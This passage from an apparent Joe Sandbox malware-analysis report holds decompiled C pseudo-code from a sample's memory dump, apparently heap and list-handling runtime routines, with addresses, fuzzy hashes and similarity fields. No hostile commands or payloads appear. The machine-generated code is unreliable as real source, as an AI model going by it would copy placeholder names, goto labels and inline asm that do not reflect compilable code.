                            				_t385 = _v5;
                            				_t422 =  *(_t444 + 8) & 0xfffffffc;
                            				if(_t385 != 0) {
                            					if(_t422 != 0) {
                            						_t422 = _t422 ^ _t444;
                            					}
                            				}
                            				_v12 = _t444;
                            				if(_t422 == 0) {
                            					if(_t426 != 0) {
                            						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
                            					}
                            					_t425 = _a4;
                            					if( *_t425 != _t444) {
                            						goto L174;
                            					} else {
                            						_t425[4] = _t426;
                            						_t306 = _t425[4] & 0x00000001;
                            						if(_t306 != 0) {
                            							_t425[4] = _t425[4] | 0x00000001;
                            						}
                            						 *_t425 = _t426;
                            						goto L24;
                            					}
                            				} else {
                            					_t452 =  *(_t422 + 4);
                            					if(_t385 != 0) {
                            						if(_t452 != 0) {
                            							_t452 = _t452 ^ _t422;
                            						}
                            					}
                            					if(_t452 == _t444) {
                            						_v16 = 1;
                            						L11:
                            						_t373 =  *(_t444 + 8);
                            						goto L12;
                            					} else {
                            						_t387 =  *_t422;
                            						if(_v5 != 0) {
                            							if(_t387 != 0) {
                            								_t387 = _t387 ^ _t422;
                            							}
                            						}
                            						if(_t387 != _t444) {
                            							goto L174;
                            						} else {
                            							_t488 = _a4;
                            							_v16 = _v16 & 0x00000000;
                            							_t388 =  *(_t488 + 4);
                            							_v24 = _t388;
                            							if((_t388 & 0xfffffffe) == _t444) {
                            								if(_t426 != 0) {
                            									 *(_t488 + 4) = _t426;
                            									if((_v24 & 0x00000001) != 0) {
                            										_t390 = _t426;
                            										L228:
                            										 *(_t488 + 4) = _t390 | 0x00000001;
                            									}
                            									goto L11;
                            								}
                            								 *(_t488 + 4) = _t422;
                            								if((_v24 & 0x00000001) == 0) {
                            									goto L11;
                            								} else {
                            									_t390 = _t422;
                            									goto L228;
                            								}
                            							}
                            							goto L11;
                            						}
                            					}
                            				}
                            			}
                            0x01775fd6
                            0x01775fd6
                            0x01775fd0
                            0x0171fe5d
                            0x0171fe60
                            0x00000000
                            0x0171fe60
                            0x0171fe41
                            0x0171fe41
                            0x00000000
                            0x0171fa1b
                            0x0171fa1b
                            0x0171fa1d
                            0x0171fa20
                            0x00000000
                            0x0171fa20
                            0x0171fa15
                            0x0171f9ed
                            0x0171f9ed
                            0x00000000
                            0x0171f9ed
                            0x0171f9cd
                            0x0171f9ba
                            0x0171f9ba
                            0x00000000
                            0x0171f9ba
                            0x0171fba8
                            0x0171fb65
                            0x0171fb1d
                            0x0171fb23
                            0x0171fb26
                            0x00000000
                            0x0171fb26
                            0x0171faf3
                            0x0171faf3
                            0x00000000
                            0x0171faf3
                            0x0171fab4
                            0x0171fa79
                            0x0171fa56
                            0x0171fa56
                            0x00000000
                            0x0171fa56
                            0x0171f94d
                            0x0171f950
                            0x0171f955
                            0x01775e79
                            0x01775e7f
                            0x01775e7f
                            0x01775e79
                            0x0171f95b
                            0x0171f960
                            0x01775e88
                            0x01775e8a
                            0x01775e8a
                            0x01775e8e
                            0x01775e93
                            0x00000000
                            0x01775e99
                            0x01775e9c
                            0x01775e9f
                            0x01775ea1
                            0x01775ea3
                            0x01775ea3
                            0x01775ea7
                            0x00000000
                            0x01775ea7
                            0x0171f966
                            0x0171f966
                            0x0171f96b
                            0x01775eb0
                            0x01775eb6
                            0x01775eb6
                            0x01775eb0
                            0x0171f973
                            0x0171fbc7
                            0x0171f9a5
                            0x0171f9a5
                            0x00000000
                            0x0171f979
                            0x0171f97d
                            0x0171f97f
                            0x01775ebf
                            0x01775ec5
                            0x01775ec5
                            0x01775ebf
                            0x0171f987
                            0x00000000
                            0x0171f98d
                            0x0171f98d
                            0x0171f990
                            0x0171f994
                            0x0171f997
                            0x0171f99f
                            0x0171fff7
                            0x01720061
                            0x01720064
                            0x0172006a
                            0x01775ece
                            0x01775ed0
                            0x01775ed0
                            0x00000000
                            0x01720064
                            0x0171fffd
                            0x01720000
                            0x00000000
                            0x01720006
                            0x01775ecc
                            0x00000000
                            0x01775ecc
                            0x01720000
                            0x00000000
                            0x0171f99f
                            0x0171f987
                            0x0171f973

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                            • Instruction ID: bcac797913432763413dd45ec5eca83bca35f983d0a446a2094af77efa002f1b
                            • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                            • Instruction Fuzzy Hash: 7562E632E046629BEF32CF2C844037AFBB1AF45614F1986A9DC65DB24AD371DD4AC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E017E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t296;
                            				signed char _t298;
                            				signed int _t301;
                            				signed int _t306;
                            				signed int _t310;
                            				signed char _t311;
                            				intOrPtr _t312;
                            				signed int _t313;
                            				void* _t327;
                            				signed int _t328;
                            				intOrPtr _t329;
                            				intOrPtr _t333;
                            				signed char _t334;
                            				signed int _t336;
                            				void* _t339;
                            				signed int _t340;
                            				signed int _t356;
                            				signed int _t362;
                            				short _t367;
                            				short _t368;
                            				short _t373;
                            				signed int _t380;
                            				void* _t382;
                            				short _t385;
                            				signed short _t392;
                            				signed char _t393;
                            				signed int _t395;
                            				signed char _t397;
                            				signed int _t398;
                            				signed short _t402;
                            				void* _t406;
                            				signed int _t412;
                            				signed char _t414;
                            				signed short _t416;
                            				signed int _t421;
                            				signed char _t427;
                            				intOrPtr _t434;
                            				signed char _t435;
                            				signed int _t436;
                            				signed int _t442;
                            				signed int _t446;
                            				signed int _t447;
                            				signed int _t451;
                            				signed int _t453;
                            				signed int _t454;
                            				signed int _t455;
                            				intOrPtr _t456;
                            				intOrPtr* _t457;
                            				short _t458;
                            				signed short _t462;
                            				signed int _t469;
                            				intOrPtr* _t474;
                            				signed int _t475;
                            				signed int _t479;
                            				signed int _t480;
                            				signed int _t481;
                            				short _t485;
                            				signed int _t491;
                            				signed int* _t494;
                            				signed int _t498;
                            				signed int _t505;
                            				intOrPtr _t506;
                            				signed short _t508;
                            				signed int _t511;
                            				void* _t517;
                            				signed int _t519;
                            				signed int _t522;
                            				void* _t523;
                            				signed int _t524;
                            				void* _t528;
                            				signed int _t529;
                            
                            				_push(0xd4);
                            				_push(0x17f1178);
                            				E0176D0E8(__ebx, __edi, __esi);
                            				_t494 = __edx;
                            				 *(_t528 - 0xcc) = __edx;
                            				_t511 = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                            				 *(_t528 - 0xbc) = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                            				_t427 = 0;
                            				 *(_t528 - 0x74) = 0;
                            				 *(_t528 - 0x9c) = 0;
                            				 *(_t528 - 0x84) = 0;
                            				 *(_t528 - 0xac) = 0;
                            				 *(_t528 - 0x88) = 0;
                            				 *(_t528 - 0xa8) = 0;
                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                            				if( *(_t528 + 0x1c) <= 0x80) {
                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                            					if(__eflags != 0) {
                            						_t421 = L017E4C56(0, __edx, __ecx, __eflags);
                            						__eflags = _t421;
                            						if(_t421 != 0) {
                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                            							E0175D000(0x410);
                            							 *(_t528 - 0x18) = _t529;
                            							 *(_t528 - 0x9c) = _t529;
                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                            							E017E5542(_t528 - 0x9c, _t528 - 0x84);
                            						}
                            					}
                            					_t435 = _t427;
                            					 *(_t528 - 0xd0) = _t435;
                            					_t474 = _t511 + 0x65;
                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            					_t511 = 0x18;
                            					while(1) {
                            						 *(_t528 - 0xa0) = _t427;
                            						 *(_t528 - 0xbc) = _t427;
                            						 *(_t528 - 0x80) = _t427;
                            						 *(_t528 - 0x78) = 0x50;
                            						 *(_t528 - 0x79) = _t427;
                            						 *(_t528 - 0x7a) = _t427;
                            						 *(_t528 - 0x8c) = _t427;
                            						 *(_t528 - 0x98) = _t427;
                            						 *(_t528 - 0x90) = _t427;
                            						 *(_t528 - 0xb0) = _t427;
                            						 *(_t528 - 0xb8) = _t427;
                            						_t296 = 1 << _t435;
                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                            						__eflags = _t436 & _t296;
                            						if((_t436 & _t296) != 0) {
                            							goto L92;
                            						}
                            						__eflags =  *((char*)(_t474 - 1));
                            						if( *((char*)(_t474 - 1)) == 0) {
                            							goto L92;
                            						}
                            						_t301 =  *_t474;
                            						__eflags = _t494[1] - _t301;
                            						if(_t494[1] <= _t301) {
                            							L10:
                            							__eflags =  *(_t474 - 5) & 0x00000040;
                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                            								L12:
                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                            									goto L92;
                            								}
                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                            									goto L92;
                            								}
                            								__eflags = _t442 -  *(_t474 - 0x11);
                            								if(_t442 !=  *(_t474 - 0x11)) {
                            									goto L92;
                            								}
                            								L15:
                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                            								 *(_t528 - 0xc0) = _t306;
                            								 *(_t528 - 0xa4) = _t306;
                            								__eflags =  *0x18060e8;
                            								if( *0x18060e8 != 0) {
                            									__eflags = _t306 - 0x40;
                            									if(_t306 < 0x40) {
                            										L20:
                            										asm("lock inc dword [eax]");
                            										_t310 =  *0x18060e8; // 0x0
                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                            										__eflags = _t311 & 0x00000001;
                            										if((_t311 & 0x00000001) == 0) {
                            											 *(_t528 - 0xa0) = _t311;
                            											_t475 = _t427;
                            											 *(_t528 - 0x74) = _t427;
                            											__eflags = _t475;
                            											if(_t475 != 0) {
                            												L91:
                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            												goto L92;
                            											}
                            											asm("sbb edi, edi");
                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                            											_t511 = _t498;
                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                            											__eflags =  *(_t312 - 5) & 1;
                            											if(( *(_t312 - 5) & 1) != 0) {
                            												_push(_t528 - 0x98);
                            												_push(0x4c);
                            												_push(_t528 - 0x70);
                            												_push(1);
                            												_push(0xfffffffa);
                            												_t412 = E01759710();
                            												_t475 = _t427;
                            												__eflags = _t412;
                            												if(_t412 >= 0) {
                            													_t414 =  *(_t528 - 0x98) - 8;
                            													 *(_t528 - 0x98) = _t414;
                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                            													 *(_t528 - 0x8c) = _t416;
                            													 *(_t528 - 0x79) = 1;
                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                            													__eflags = _t511;
                            												}
                            											}
                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                            											__eflags = _t446 & 0x00000004;
                            											if((_t446 & 0x00000004) != 0) {
                            												__eflags =  *(_t528 - 0x9c);
                            												if( *(_t528 - 0x9c) != 0) {
                            													 *(_t528 - 0x7a) = 1;
                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                            													__eflags = _t511;
                            												}
                            											}
                            											_t313 = 2;
                            											_t447 = _t446 & _t313;
                            											__eflags = _t447;
                            											 *(_t528 - 0xd4) = _t447;
                            											if(_t447 != 0) {
                            												_t406 = 0x10;
                            												_t511 = _t511 + _t406;
                            												__eflags = _t511;
                            											}
                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                            											 *(_t528 - 0x88) = _t427;
                            											__eflags =  *(_t528 + 0x1c);
                            											if( *(_t528 + 0x1c) <= 0) {
                            												L45:
                            												__eflags =  *(_t528 - 0xb0);
                            												if( *(_t528 - 0xb0) != 0) {
                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            													__eflags = _t511;
                            												}
                            												__eflags = _t475;
                            												if(_t475 != 0) {
                            													asm("lock dec dword [ecx+edx*8+0x4]");
                            													goto L100;
                            												} else {
                            													_t494[3] = _t511;
                            													_t451 =  *(_t528 - 0xa0);
                            													_t427 = E01756DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                            													 *(_t528 - 0x88) = _t427;
                            													__eflags = _t427;
                            													if(_t427 == 0) {
                            														__eflags = _t511 - 0xfff8;
                            														if(_t511 <= 0xfff8) {
                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                            															asm("sbb ecx, ecx");
                            															__eflags = (_t451 & 0x000000e2) + 8;
                            														}
                            														asm("lock dec dword [eax+edx*8+0x4]");
                            														L100:
                            														goto L101;
                            													}
                            													_t453 =  *(_t528 - 0xa0);
                            													 *_t494 = _t453;
                            													_t494[1] = _t427;
                            													_t494[2] =  *(_t528 - 0xbc);
                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x14);
                            													if( *(_t528 + 0x14) == 0) {
                            														__eflags =  *[fs:0x18] + 0xf50;
                            													}
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x18);
                            													if( *(_t528 + 0x18) == 0) {
                            														_t454 =  *(_t528 - 0x80);
                            														_t479 =  *(_t528 - 0x78);
                            														_t327 = 1;
                            														__eflags = 1;
                            													} else {
                            														_t146 = _t427 + 0x50; // 0x50
                            														_t454 = _t146;
                            														 *(_t528 - 0x80) = _t454;
                            														_t382 = 0x18;
                            														 *_t454 = _t382;
                            														 *((short*)(_t454 + 2)) = 1;
                            														_t385 = 0x10;
                            														 *((short*)(_t454 + 6)) = _t385;
                            														 *(_t454 + 4) = 0;
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = 0x68;
                            														 *(_t528 - 0x78) = _t479;
                            													}
                            													__eflags =  *(_t528 - 0x79) - _t327;
                            													if( *(_t528 - 0x79) == _t327) {
                            														_t524 = _t479 + _t427;
                            														_t508 =  *(_t528 - 0x8c);
                            														 *_t524 = _t508;
                            														_t373 = 2;
                            														 *((short*)(_t524 + 2)) = _t373;
                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                            														 *((short*)(_t524 + 4)) = 0;
                            														_t167 = _t524 + 8; // 0x8
                            														E0175F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t380 =  *(_t528 - 0x80);
                            														__eflags = _t380;
                            														if(_t380 != 0) {
                            															_t173 = _t380 + 4;
                            															 *_t173 =  *(_t380 + 4) | 1;
                            															__eflags =  *_t173;
                            														}
                            														_t454 = _t524;
                            														 *(_t528 - 0x80) = _t454;
                            														_t327 = 1;
                            														__eflags = 1;
                            													}
                            													__eflags =  *(_t528 - 0xd4);
                            													if( *(_t528 - 0xd4) == 0) {
                            														_t505 =  *(_t528 - 0x80);
                            													} else {
                            														_t505 = _t479 + _t427;
                            														_t523 = 0x10;
                            														 *_t505 = _t523;
                            														_t367 = 3;
                            														 *((short*)(_t505 + 2)) = _t367;
                            														_t368 = 4;
                            														 *((short*)(_t505 + 6)) = _t368;
                            														 *(_t505 + 4) = 0;
                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = _t479 + _t523;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t454;
                            														if(_t454 != 0) {
                            															_t186 = _t454 + 4;
                            															 *_t186 =  *(_t454 + 4) | 1;
                            															__eflags =  *_t186;
                            														}
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0x7a) - _t327;
                            													if( *(_t528 - 0x7a) == _t327) {
                            														 *(_t528 - 0xd4) = _t479 + _t427;
                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                            														E0175F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + _t522;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t199 = _t505 + 4;
                            															 *_t199 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t199;
                            														}
                            														_t505 =  *(_t528 - 0xd4);
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0xa8);
                            													if( *(_t528 - 0xa8) != 0) {
                            														_t356 = _t479 + _t427;
                            														 *(_t528 - 0xd4) = _t356;
                            														_t462 =  *(_t528 - 0xac);
                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                            														_t485 = 0xc;
                            														 *((short*)(_t356 + 2)) = _t485;
                            														 *(_t356 + 6) = _t462;
                            														 *((short*)(_t356 + 4)) = 0;
                            														_t211 = _t356 + 8; // 0x9
                            														E0175F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                            														E0175FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0x18;
                            														_t427 =  *(_t528 - 0x88);
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t505 =  *(_t528 - 0xd4);
                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t362 =  *(_t528 - 0x80);
                            														__eflags = _t362;
                            														if(_t362 != 0) {
                            															_t222 = _t362 + 4;
                            															 *_t222 =  *(_t362 + 4) | 1;
                            															__eflags =  *_t222;
                            														}
                            													}
                            													__eflags =  *(_t528 - 0xb0);
                            													if( *(_t528 - 0xb0) != 0) {
                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                            														_t458 = 0xb;
                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                            														E0175FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t241 = _t505 + 4;
                            															 *_t241 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t241;
                            														}
                            													}
                            													_t328 =  *(_t528 + 0x1c);
                            													__eflags = _t328;
                            													if(_t328 == 0) {
                            														L87:
                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                            														_t455 =  *(_t528 - 0xdc);
                            														 *(_t427 + 0x14) = _t455;
                            														_t480 =  *(_t528 - 0xa0);
                            														_t517 = 3;
                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                            															asm("rdtsc");
                            															 *(_t427 + 0x3c) = _t480;
                            														} else {
                            															 *(_t427 + 0x3c) = _t455;
                            														}
                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                            														_t456 =  *[fs:0x18];
                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                            														_t427 = 0;
                            														__eflags = 0;
                            														_t511 = 0x18;
                            														goto L91;
                            													} else {
                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                            														__eflags = _t519;
                            														 *(_t528 - 0x8c) = _t328;
                            														do {
                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                            																_t334 =  *_t519;
                            															} else {
                            																_t334 = 0;
                            															}
                            															_t336 = _t334 & 0x000000ff;
                            															__eflags = _t336;
                            															_t427 =  *(_t528 - 0x88);
                            															if(_t336 == 0) {
                            																_t481 = _t479 + _t506;
                            																__eflags = _t481;
                            																 *(_t528 - 0x78) = _t481;
                            																E0175F3E0(_t479 + _t427, _t457, _t506);
                            																_t529 = _t529 + 0xc;
                            															} else {
                            																_t340 = _t336 - 1;
                            																__eflags = _t340;
                            																if(_t340 == 0) {
                            																	E0175F3E0( *(_t528 - 0xb8), _t457, _t506);
                            																	_t529 = _t529 + 0xc;
                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                            																} else {
                            																	__eflags = _t340 == 0;
                            																	if(_t340 == 0) {
                            																		__eflags = _t506 - 8;
                            																		if(_t506 == 8) {
                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                            																		}
                            																	}
                            																}
                            															}
                            															_t339 = 0x10;
                            															_t519 = _t519 + _t339;
                            															_t263 = _t528 - 0x8c;
                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                            															__eflags =  *_t263;
                            															_t479 =  *(_t528 - 0x78);
                            														} while ( *_t263 != 0);
                            														goto L87;
                            													}
                            												}
                            											} else {
                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                            												 *(_t528 - 0xa2) = _t392;
                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                            												__eflags = _t469;
                            												while(1) {
                            													 *(_t528 - 0xe4) = _t511;
                            													__eflags = _t392;
                            													_t393 = _t427;
                            													if(_t392 != 0) {
                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                            													}
                            													_t395 = (_t393 & 0x000000ff) - _t427;
                            													__eflags = _t395;
                            													if(_t395 == 0) {
                            														_t511 = _t511 +  *_t469;
                            														__eflags = _t511;
                            													} else {
                            														_t398 = _t395 - 1;
                            														__eflags = _t398;
                            														if(_t398 == 0) {
                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                            														} else {
                            															__eflags = _t398 == 1;
                            															if(_t398 == 1) {
                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                            																_t402 =  *_t469 & 0x0000ffff;
                            																 *(_t528 - 0xac) = _t402;
                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            															}
                            														}
                            													}
                            													__eflags = _t511 -  *(_t528 - 0xe4);
                            													if(_t511 <  *(_t528 - 0xe4)) {
                            														break;
                            													}
                            													_t397 =  *(_t528 - 0x88) + 1;
                            													 *(_t528 - 0x88) = _t397;
                            													_t469 = _t469 + 0x10;
                            													__eflags = _t397 -  *(_t528 + 0x1c);
                            													_t392 =  *(_t528 - 0xa2);
                            													if(_t397 <  *(_t528 + 0x1c)) {
                            														continue;
                            													}
                            													goto L45;
                            												}
                            												_t475 = 0x216;
                            												 *(_t528 - 0x74) = 0x216;
                            												goto L45;
                            											}
                            										} else {
                            											asm("lock dec dword [eax+ecx*8+0x4]");
                            											goto L16;
                            										}
                            									}
                            									_t491 = L017E4CAB(_t306, _t528 - 0xa4);
                            									 *(_t528 - 0x74) = _t491;
                            									__eflags = _t491;
                            									if(_t491 != 0) {
                            										goto L91;
                            									} else {
                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            										goto L20;
                            									}
                            								}
                            								L16:
                            								 *(_t528 - 0x74) = 0x1069;
                            								L93:
                            								_t298 =  *(_t528 - 0xd0) + 1;
                            								 *(_t528 - 0xd0) = _t298;
                            								_t474 = _t474 + _t511;
                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            								_t494 = 4;
                            								__eflags = _t298 - _t494;
                            								if(_t298 >= _t494) {
                            									goto L100;
                            								}
                            								_t494 =  *(_t528 - 0xcc);
                            								_t435 = _t298;
                            								continue;
                            							}
                            							__eflags = _t494[2] | _t494[3];
                            							if((_t494[2] | _t494[3]) == 0) {
                            								goto L15;
                            							}
                            							goto L12;
                            						}
                            						__eflags = _t301;
                            						if(_t301 != 0) {
                            							goto L92;
                            						}
                            						goto L10;
                            						L92:
                            						goto L93;
                            					}
                            				} else {
                            					_push(0x57);
                            					L101:
                            					return E0176D130(_t427, _t494, _t511);
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e713dd3086739fcca737fe09c6c9cb55042ba98b442d001a50ca4d82c0548eae
                            • Instruction ID: 9adf5dcd4ecc34b3d618dc689c93441dc01fe0b49eaf8a55759c59bf614f45b1
                            • Opcode Fuzzy Hash: e713dd3086739fcca737fe09c6c9cb55042ba98b442d001a50ca4d82c0548eae
                            • Instruction Fuzzy Hash: 33425A75900229CFDB64CF68C884BA9FBF1FF59304F1481AAE94DAB242D7749A85CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E01734120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                            				signed int _v8;
                            				void* _v20;
                            				signed int _v24;
                            				char _v532;
                            				char _v540;
                            				signed short _v544;
                            				signed int _v548;
                            				signed short* _v552;
                            				signed short _v556;
                            				signed short* _v560;
                            				signed short* _v564;
                            				signed short* _v568;
                            				void* _v570;
                            				signed short* _v572;
                            				signed short _v576;
                            				signed int _v580;
                            				char _v581;
                            				void* _v584;
                            				unsigned int _v588;
                            				signed short* _v592;
                            				void* _v597;
                            				void* _v600;
                            				void* _v604;
                            				void* _v609;
                            				void* _v616;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				unsigned int _t161;
                            				signed int _t162;
                            				unsigned int _t163;
                            				void* _t169;
                            				signed short _t173;
                            				signed short _t177;
                            				signed short _t181;
                            				unsigned int _t182;
                            				signed int _t185;
                            				signed int _t213;
                            				signed int _t225;
                            				short _t233;
                            				signed char _t234;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				signed int _t250;
                            				void* _t251;
                            				signed short* _t254;
                            				void* _t255;
                            				signed int _t256;
                            				void* _t257;
                            				signed short* _t260;
                            				signed short _t265;
                            				signed short* _t269;
                            				signed short _t271;
                            				signed short** _t272;
                            				signed short* _t275;
                            				signed short _t282;
                            				signed short _t283;
                            				signed short _t290;
                            				signed short _t299;
                            				signed short _t307;
                            				signed int _t308;
                            				signed short _t311;
                            				signed short* _t315;
                            				signed short _t316;
                            				void* _t317;
                            				void* _t319;
                            				signed short* _t321;
                            				void* _t322;
                            				void* _t323;
                            				unsigned int _t324;
                            				signed int _t325;
                            				void* _t326;
                            				signed int _t327;
                            				signed int _t329;
                            
                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                            				_v8 =  *0x180d360 ^ _t329;
                            				_t157 = _a8;
                            				_t321 = _a4;
                            				_t315 = __edx;
                            				_v548 = __ecx;
                            				_t305 = _a20;
                            				_v560 = _a12;
